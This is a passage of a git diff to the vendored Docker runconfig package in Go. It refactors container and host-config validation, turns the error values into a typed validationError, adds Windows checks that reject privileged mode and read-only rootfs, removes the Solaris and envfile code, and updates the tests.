- for spec := range c.Volumes { - if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { - return fmt.Errorf("invalid volume spec %q: %v", spec, err) - } + // Validate Privileged + if err := validatePrivileged(hc); err != nil { + return nil, nil, nil, err } - for _, spec := range hc.Binds { - if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { - return fmt.Errorf("invalid bind mount spec %q: %v", spec, err) - } + + // Validate ReadonlyRootfs + if err := validateReadonlyRootfs(hc); err != nil { + return nil, nil, nil, err } - return nil + return w.Config, hc, w.NetworkingConfig, nil } diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go index f1f9de5950..67d386969f 100644 --- a/vendor/github.com/docker/docker/runconfig/config_test.go +++ b/vendor/github.com/docker/docker/runconfig/config_test.go @@ -1,4 +1,4 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "bytes" @@ -12,6 +12,8 @@ import ( "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/api/types/strslice" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) type f struct { @@ -26,11 +28,6 @@ func TestDecodeContainerConfig(t *testing.T) { image string ) - //TODO: Should run for Solaris - if runtime.GOOS == "solaris" { - t.Skip() - } - if runtime.GOOS != "windows" { image = "ubuntu" fixtures = []f{ @@ -51,7 +48,7 @@ func TestDecodeContainerConfig(t *testing.T) { t.Fatal(err) } - c, h, _, err := DecodeContainerConfig(bytes.NewReader(b)) + c, h, _, err := decodeContainerConfig(bytes.NewReader(b)) if err != nil { t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) } @@ -75,9 +72,9 @@ func TestDecodeContainerConfig(t *testing.T) { // as to what level of container isolation is supported. 
func TestDecodeContainerConfigIsolation(t *testing.T) { - // An invalid isolation level + // An Invalid isolation level if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "invalid"`) { t.Fatal(err) } } @@ -99,7 +96,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) { } } else { if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "process"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "process"`) { t.Fatal(err) } } @@ -112,7 +109,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) { } } else { if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "hyperv"`) { t.Fatal(err) } } @@ -135,5 +132,59 @@ func callDecodeContainerConfigIsolation(isolation string) (*container.Config, *c if b, err = json.Marshal(w); err != nil { return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) } - return DecodeContainerConfig(bytes.NewReader(b)) + return decodeContainerConfig(bytes.NewReader(b)) +} + +type decodeConfigTestcase struct { + doc string + wrapper ContainerConfigWrapper + expectedErr string + expectedConfig *container.Config + expectedHostConfig *container.HostConfig + goos string +} + +func runDecodeContainerConfigTestCase(testcase decodeConfigTestcase) func(t *testing.T) { + return func(t *testing.T) { + raw := marshal(t, testcase.wrapper, testcase.doc) + config, hostConfig, _, err := decodeContainerConfig(bytes.NewReader(raw)) + if testcase.expectedErr != "" { + if !assert.Check(t, is.ErrorContains(err, "")) { + return + } + assert.Check(t, is.Contains(err.Error(), testcase.expectedErr)) + return + } + assert.Check(t, err) + assert.Check(t, 
is.DeepEqual(testcase.expectedConfig, config)) + assert.Check(t, is.DeepEqual(testcase.expectedHostConfig, hostConfig)) + } +} + +func marshal(t *testing.T, w ContainerConfigWrapper, doc string) []byte { + b, err := json.Marshal(w) + assert.NilError(t, err, "%s: failed to encode config wrapper", doc) + return b +} + +func containerWrapperWithVolume(volume string) ContainerConfigWrapper { + return ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{ + volume: {}, + }, + }, + HostConfig: &container.HostConfig{}, + } +} + +func containerWrapperWithBind(bind string) ContainerConfigWrapper { + return ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{}, + }, + HostConfig: &container.HostConfig{ + Binds: []string{bind}, + }, + } } diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go index 4ccfc73be2..65e8d6fcd4 100644 --- a/vendor/github.com/docker/docker/runconfig/config_unix.go +++ b/vendor/github.com/docker/docker/runconfig/config_unix.go @@ -1,6 +1,6 @@ // +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "github.com/docker/docker/api/types/container" @@ -53,7 +53,7 @@ func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { // Make sure NetworkMode has an acceptable value. We do this to ensure // backwards compatible API behavior. 
- hc = SetDefaultNetModeIfBlank(hc) + SetDefaultNetModeIfBlank(hc) return hc } diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go index f2361b554b..cced59d4df 100644 --- a/vendor/github.com/docker/docker/runconfig/config_windows.go +++ b/vendor/github.com/docker/docker/runconfig/config_windows.go @@ -1,4 +1,4 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "github.com/docker/docker/api/types/container" diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go index bb72c1699c..038fe39660 100644 --- a/vendor/github.com/docker/docker/runconfig/errors.go +++ b/vendor/github.com/docker/docker/runconfig/errors.go @@ -1,46 +1,42 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" -import ( - "fmt" - - "github.com/docker/docker/api/errors" -) - -var ( +const ( // ErrConflictContainerNetworkAndLinks conflict between --net=container and links - ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior") - // ErrConflictUserDefinedNetworkAndLinks conflict between --net= and links - ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior") + ErrConflictContainerNetworkAndLinks validationError = "conflicting options: container type network can't be used with links. 
This would result in undefined behavior" // ErrConflictSharedNetwork conflict between private and other networks - ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network") + ErrConflictSharedNetwork validationError = "container sharing network namespace with another container or host cannot be connected to any other network" // ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network. - ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network") + ErrConflictHostNetwork validationError = "container cannot be disconnected from host network or connected to host network" // ErrConflictNoNetwork conflict between private and other networks - ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode") + ErrConflictNoNetwork validationError = "container cannot be connected to multiple networks with one of the networks in private (none) mode" // ErrConflictNetworkAndDNS conflict between --dns and the network mode - ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode") + ErrConflictNetworkAndDNS validationError = "conflicting options: dns and the network mode" // ErrConflictNetworkHostname conflict between the hostname and the network mode - ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode") + ErrConflictNetworkHostname validationError = "conflicting options: hostname and the network mode" // ErrConflictHostNetworkAndLinks conflict between --net=host and links - ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior") + ErrConflictHostNetworkAndLinks validationError = "conflicting options: host type networking can't be used with links. 
This would result in undefined behavior" // ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode - ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode") + ErrConflictContainerNetworkAndMac validationError = "conflicting options: mac-address and the network mode" // ErrConflictNetworkHosts conflict between add-host and the network mode - ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode") + ErrConflictNetworkHosts validationError = "conflicting options: custom host-to-IP mapping and the network mode" // ErrConflictNetworkPublishPorts conflict between the publish options and the network mode - ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode") + ErrConflictNetworkPublishPorts validationError = "conflicting options: port publishing and the container type network mode" // ErrConflictNetworkExposePorts conflict between the expose option and the network mode - ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode") + ErrConflictNetworkExposePorts validationError = "conflicting options: port exposing and the container type network mode" // ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address - ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only") + ErrUnsupportedNetworkAndIP validationError = "user specified IP address is supported on user defined networks only" // ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured subnet and requested ip address - ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets") + ErrUnsupportedNetworkNoSubnetAndIP validationError = "user specified IP address is supported 
only when connecting to networks with user configured subnets" // ErrUnsupportedNetworkAndAlias conflict between network mode and alias - ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks") + ErrUnsupportedNetworkAndAlias validationError = "network-scoped alias is supported only for containers in user defined networks" // ErrConflictUTSHostname conflict between the hostname and the UTS mode - ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode") + ErrConflictUTSHostname validationError = "conflicting options: hostname and the UTS mode" ) -func conflictError(err error) error { - return errors.NewRequestConflictError(err) +type validationError string + +func (e validationError) Error() string { + return string(e) } + +func (e validationError) InvalidParameter() {} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go index 2b81d02c20..7d99e5acfa 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go @@ -1,15 +1,16 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "encoding/json" "io" + "strings" "github.com/docker/docker/api/types/container" ) // DecodeHostConfig creates a HostConfig based on the specified Reader. // It assumes the content of the reader will be JSON, and decodes it. -func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { +func decodeHostConfig(src io.Reader) (*container.HostConfig, error) { decoder := json.NewDecoder(src) var w ContainerConfigWrapper @@ -25,11 +26,54 @@ func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { // to default if it is not populated. This ensures backwards compatibility after // the validation of the network mode was moved from the docker CLI to the // docker daemon. 
-func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig { +func SetDefaultNetModeIfBlank(hc *container.HostConfig) { if hc != nil { if hc.NetworkMode == container.NetworkMode("") { hc.NetworkMode = container.NetworkMode("default") } } - return hc +} + +// validateNetContainerMode ensures that the various combinations of requested +// network settings wrt container mode are valid. +func validateNetContainerMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if parts[0] == "container" { + if len(parts) < 2 || parts[1] == "" { + return validationError("Invalid network mode: invalid container format container:") + } + } + + if hc.NetworkMode.IsContainer() && c.Hostname != "" { + return ErrConflictNetworkHostname + } + + if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { + return ErrConflictContainerNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { + return ErrConflictNetworkAndDNS + } + + if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { + return ErrConflictNetworkHosts + } + + if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { + return ErrConflictContainerNetworkAndMac + } + + if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts) { + return ErrConflictNetworkPublishPorts + } + + if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { + return ErrConflictNetworkExposePorts + } + return nil } diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go deleted file mode 100644 index 83ad32ecc7..0000000000 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -package runconfig - -import ( - "github.com/docker/docker/api/types/container" - 
"github.com/docker/docker/pkg/sysinfo" -) - -// DefaultDaemonNetworkMode returns the default network stack the daemon should -// use. -func DefaultDaemonNetworkMode() container.NetworkMode { - return container.NetworkMode("bridge") -} - -// IsPreDefinedNetwork indicates if a network is predefined by the daemon -func IsPreDefinedNetwork(network string) bool { - return false -} - -// ValidateNetMode ensures that the various combinations of requested -// network settings are valid. -func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { - // We may not be passed a host config, such as in the case of docker commit - return nil -} - -// ValidateIsolation performs platform specific validation of the -// isolation level in the hostconfig structure. -// This setting is currently discarded for Solaris so this is a no-op. -func ValidateIsolation(hc *container.HostConfig) error { - return nil -} - -// ValidateQoS performs platform specific validation of the QoS settings -func ValidateQoS(hc *container.HostConfig) error { - return nil -} - -// ValidateResources performs platform specific validation of the resource settings -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go index a6a2b34fc1..b04cbc6bc3 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go @@ -1,6 +1,6 @@ // +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "bytes" @@ -10,6 +10,8 @@ import ( "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // TODO Windows: This will need addressing for a Windows daemon. 
@@ -61,43 +63,33 @@ func TestNetworkModeTest(t *testing.T) { } func TestIpcModeTest(t *testing.T) { - ipcModes := map[container.IpcMode][]bool{ - // private, host, container, valid - "": {true, false, false, true}, - "something:weird": {true, false, false, false}, - ":weird": {true, false, false, true}, - "host": {false, true, false, true}, - "container:name": {false, false, true, true}, - "container:name:something": {false, false, true, false}, - "container:": {false, false, true, false}, + ipcModes := map[container.IpcMode]struct { + private bool + host bool + container bool + shareable bool + valid bool + ctrName string + }{ + "": {valid: true}, + "private": {private: true, valid: true}, + "something:weird": {}, + ":weird": {}, + "host": {host: true, valid: true}, + "container": {}, + "container:": {container: true, valid: true, ctrName: ""}, + "container:name": {container: true, valid: true, ctrName: "name"}, + "container:name1:name2": {container: true, valid: true, ctrName: "name1:name2"}, + "shareable": {shareable: true, valid: true}, } + for ipcMode, state := range ipcModes { - if ipcMode.IsPrivate() != state[0] { - t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate()) - } - if ipcMode.IsHost() != state[1] { - t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost()) - } - if ipcMode.IsContainer() != state[2] { - t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer()) - } - if ipcMode.Valid() != state[3] { - t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid()) - } - } - containerIpcModes := map[container.IpcMode]string{ - "": "", - "something": "", - "something:weird": "weird", - "container": "", - "container:": "", - "container:name": "name", - "container:name1:name2": "name1:name2", - } - for ipcMode, container := range containerIpcModes { - if 
ipcMode.Container() != container { - t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container()) - } + assert.Check(t, is.Equal(state.private, ipcMode.IsPrivate()), "IpcMode.IsPrivate() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.host, ipcMode.IsHost()), "IpcMode.IsHost() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.container, ipcMode.IsContainer()), "IpcMode.IsContainer() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.shareable, ipcMode.IsShareable()), "IpcMode.IsShareable() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.valid, ipcMode.Valid()), "IpcMode.Valid() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.ctrName, ipcMode.Container()), "IpcMode.Container() parsing failed for %q", ipcMode) } } @@ -167,11 +159,11 @@ func TestPidModeTest(t *testing.T) { func TestRestartPolicy(t *testing.T) { restartPolicies := map[container.RestartPolicy][]bool{ // none, always, failure - container.RestartPolicy{}: {true, false, false}, - container.RestartPolicy{"something", 0}: {false, false, false}, - container.RestartPolicy{"no", 0}: {true, false, false}, - container.RestartPolicy{"always", 0}: {false, true, false}, - container.RestartPolicy{"on-failure", 0}: {false, false, true}, + {}: {true, false, false}, + {Name: "something", MaximumRetryCount: 0}: {false, false, false}, + {Name: "no", MaximumRetryCount: 0}: {true, false, false}, + {Name: "always", MaximumRetryCount: 0}: {false, true, false}, + {Name: "on-failure", MaximumRetryCount: 0}: {false, false, true}, } for restartPolicy, state := range restartPolicies { if restartPolicy.IsNone() != state[0] { @@ -199,14 +191,12 @@ func TestDecodeHostConfig(t *testing.T) { t.Fatal(err) } - c, err := DecodeHostConfig(bytes.NewReader(b)) + c, err := decodeHostConfig(bytes.NewReader(b)) if err != nil { t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) } - if c.Privileged != false { - t.Fatalf("Expected privileged 
false, found %v\n", c.Privileged) - } + assert.Check(t, !c.Privileged) if l := len(c.Binds); l != 1 { t.Fatalf("Expected 1 bind, found %d\n", l) @@ -217,7 +207,7 @@ func TestDecodeHostConfig(t *testing.T) { } if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" { - t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop) + t.Fatalf("Expected CapDrop NET_ADMIN, got %v", c.CapDrop) } } } @@ -276,7 +266,7 @@ func TestValidateResources(t *testing.T) { si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime - if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected { + if err := validateResources(&hc, &si); (err != nil) != rt.ErrorExpected { t.Fatal(rt.FailureMsg, err) } } diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go index 6e2b7f5ff7..e579b06d9b 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go @@ -1,11 +1,10 @@ -// +build !windows,!solaris +// +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "fmt" "runtime" - "strings" "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" @@ -20,25 +19,20 @@ func DefaultDaemonNetworkMode() container.NetworkMode { // IsPreDefinedNetwork indicates if a network is predefined by the daemon func IsPreDefinedNetwork(network string) bool { n := container.NetworkMode(network) - return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress" + return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() } -// ValidateNetMode ensures that the various combinations of requested +// validateNetMode ensures that the various combinations of requested // network settings are valid. 
-func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { +func validateNetMode(c *container.Config, hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } - parts := strings.Split(string(hc.NetworkMode), ":") - if parts[0] == "container" { - if len(parts) < 2 || parts[1] == "" { - return fmt.Errorf("--net: invalid net mode: invalid container format container:") - } - } - if hc.NetworkMode.IsContainer() && c.Hostname != "" { - return ErrConflictNetworkHostname + err := validateNetContainerMode(c, hc) + if err != nil { + return err } if hc.UTSMode.IsHost() && c.Hostname != "" { @@ -49,81 +43,68 @@ func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { return ErrConflictHostNetworkAndLinks } - if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { - return ErrConflictContainerNetworkAndLinks - } - - if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { - return ErrConflictNetworkAndDNS - } - - if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { - return ErrConflictNetworkHosts - } - - if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { - return ErrConflictContainerNetworkAndMac - } - - if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) { - return ErrConflictNetworkPublishPorts - } - - if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { - return ErrConflictNetworkExposePorts - } return nil } -// ValidateIsolation performs platform specific validation of +// validateIsolation performs platform specific validation of // isolation in the hostconfig structure. 
Linux only supports "default" // which is LXC container isolation -func ValidateIsolation(hc *container.HostConfig) error { +func validateIsolation(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if !hc.Isolation.IsValid() { - return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) + return fmt.Errorf("Invalid isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) } return nil } -// ValidateQoS performs platform specific validation of the QoS settings -func ValidateQoS(hc *container.HostConfig) error { +// validateQoS performs platform specific validation of the QoS settings +func validateQoS(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if hc.IOMaximumBandwidth != 0 { - return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS) + return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum bandwidth", runtime.GOOS) } if hc.IOMaximumIOps != 0 { - return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS) + return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum IOPs", runtime.GOOS) } return nil } -// ValidateResources performs platform specific validation of the resource settings +// validateResources performs platform specific validation of the resource settings // cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { +func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod { - return 
fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period") + return fmt.Errorf("Your kernel does not support cgroup cpu real-time period") } if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime { - return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime") + return fmt.Errorf("Your kernel does not support cgroup cpu real-time runtime") } if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod { - return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period") + return fmt.Errorf("cpu real-time runtime cannot be higher than cpu real-time period") } return nil } + +// validatePrivileged performs platform specific validation of the Privileged setting +func validatePrivileged(hc *container.HostConfig) error { + return nil +} + +// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting +func validateReadonlyRootfs(hc *container.HostConfig) error { + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go index 91bd6dcc3c..33a4668af1 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go @@ -1,8 +1,7 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "fmt" - "strings" "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" @@ -19,50 +18,79 @@ func IsPreDefinedNetwork(network string) bool { return !container.NetworkMode(network).IsUserDefined() } -// ValidateNetMode ensures that the various combinations of requested +// validateNetMode ensures that the various combinations of requested // network settings are valid. 
-func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { +func validateNetMode(c *container.Config, hc *container.HostConfig) error { if hc == nil { return nil } - parts := strings.Split(string(hc.NetworkMode), ":") - if len(parts) > 1 { - return fmt.Errorf("invalid --net: %s", hc.NetworkMode) + + err := validateNetContainerMode(c, hc) + if err != nil { + return err + } + + if hc.NetworkMode.IsContainer() && hc.Isolation.IsHyperV() { + return fmt.Errorf("Using the network stack of another container is not supported while using Hyper-V Containers") } + return nil } -// ValidateIsolation performs platform specific validation of the +// validateIsolation performs platform specific validation of the // isolation in the hostconfig structure. Windows supports 'default' (or // blank), 'process', or 'hyperv'. -func ValidateIsolation(hc *container.HostConfig) error { +func validateIsolation(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if !hc.Isolation.IsValid() { - return fmt.Errorf("invalid --isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) + return fmt.Errorf("Invalid isolation: %q. 
Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) } return nil } -// ValidateQoS performs platform specific validation of the Qos settings -func ValidateQoS(hc *container.HostConfig) error { +// validateQoS performs platform specific validation of the Qos settings +func validateQoS(hc *container.HostConfig) error { return nil } -// ValidateResources performs platform specific validation of the resource settings -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { +// validateResources performs platform specific validation of the resource settings +func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } - if hc.Resources.CPURealtimePeriod != 0 { - return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature") + return fmt.Errorf("Windows does not support CPU real-time period") } if hc.Resources.CPURealtimeRuntime != 0 { - return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature") + return fmt.Errorf("Windows does not support CPU real-time runtime") + } + return nil +} + +// validatePrivileged performs platform specific validation of the Privileged setting +func validatePrivileged(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if hc.Privileged { + return fmt.Errorf("Windows does not support privileged mode") + } + return nil +} + +// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting +func validateReadonlyRootfs(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if hc.ReadonlyRootfs { + return fmt.Errorf("Windows does not support root filesystem in read-only mode") } return nil } diff --git 
a/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go new file mode 100644 index 0000000000..d7a480f313 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go @@ -0,0 +1,17 @@ +// +build windows + +package runconfig // import "github.com/docker/docker/runconfig" + +import ( + "testing" + + "github.com/docker/docker/api/types/container" +) + +func TestValidatePrivileged(t *testing.T) { + expected := "Windows does not support privileged mode" + err := validatePrivileged(&container.HostConfig{Privileged: true}) + if err == nil || err.Error() != expected { + t.Fatalf("Expected %s", expected) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go deleted file mode 100644 index f723799215..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/envfile.go +++ /dev/null @@ -1,81 +0,0 @@ -package opts - -import ( - "bufio" - "bytes" - "fmt" - "os" - "strings" - "unicode" - "unicode/utf8" -) - -// ParseEnvFile reads a file with environment variables enumerated by lines -// -// ``Environment variable names used by the utilities in the Shell and -// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase -// letters, digits, and the '_' (underscore) from the characters defined in -// Portable Character Set and do not begin with a digit. *But*, other -// characters may be permitted by an implementation; applications shall -// tolerate the presence of such names.'' -// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html -// -// As of #16585, it's up to application inside docker to validate or not -// environment variables, that's why we just strip leading whitespace and -// nothing more. 
-func ParseEnvFile(filename string) ([]string, error) { - fh, err := os.Open(filename) - if err != nil { - return []string{}, err - } - defer fh.Close() - - lines := []string{} - scanner := bufio.NewScanner(fh) - currentLine := 0 - utf8bom := []byte{0xEF, 0xBB, 0xBF} - for scanner.Scan() { - scannedBytes := scanner.Bytes() - if !utf8.Valid(scannedBytes) { - return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes) - } - // We trim UTF8 BOM - if currentLine == 0 { - scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) - } - // trim the line from all leading whitespace first - line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) - currentLine++ - // line is not empty, and not starting with '#' - if len(line) > 0 && !strings.HasPrefix(line, "#") { - data := strings.SplitN(line, "=", 2) - - // trim the front of a variable, but nothing else - variable := strings.TrimLeft(data[0], whiteSpaces) - if strings.ContainsAny(variable, whiteSpaces) { - return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)} - } - - if len(data) > 1 { - - // pass the value through, no trimming - lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1])) - } else { - // if only a pass-through variable is given, clean it up. 
